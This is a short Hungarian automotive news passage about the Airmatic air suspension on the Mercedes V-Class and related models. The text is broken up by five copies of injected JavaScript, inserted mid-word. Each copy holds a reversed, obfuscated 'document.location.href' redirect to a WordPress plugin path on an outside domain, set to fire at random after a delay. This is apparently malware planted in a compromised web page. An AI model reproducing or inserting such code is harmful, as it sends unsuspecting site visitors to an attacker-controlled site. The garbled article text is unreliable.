A kategóriában egyedülálló Airmatic pneumatikus rugózást kapott a Mercedes V-osztály, a márka személyautó-kínálatának jelenlegi legtágasabb és legpraktikusabb tagja. A kerekenkénti adaptív csillapítással működő rendszer Komfort és Manuális üzemmódban 110 km/óráig normál hasmagassággal halad az autó, ezt követően 10 mm-rel leülteti a futóművet a vezérlést. Sport programban végig tartja a 10 mm-es csökkentést a légrugózás, míg az Emelés program 0-30 km/óra sebességtartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tományban 35 mm-rel megnöveli a szabad hasmagasságot. A szabályozás teljesen autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomatikus, így eltérő tengelyterheléskor (pl. vontatáskor) stabilabban és kényelmesebben vezethetünk. Az Airmatic légrugózás a modell elektromos verziójához (EQV); a Vitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Tourer és eVitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Tourer modellekhez, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbá a teljes Marco Polo…
- Hirdetés -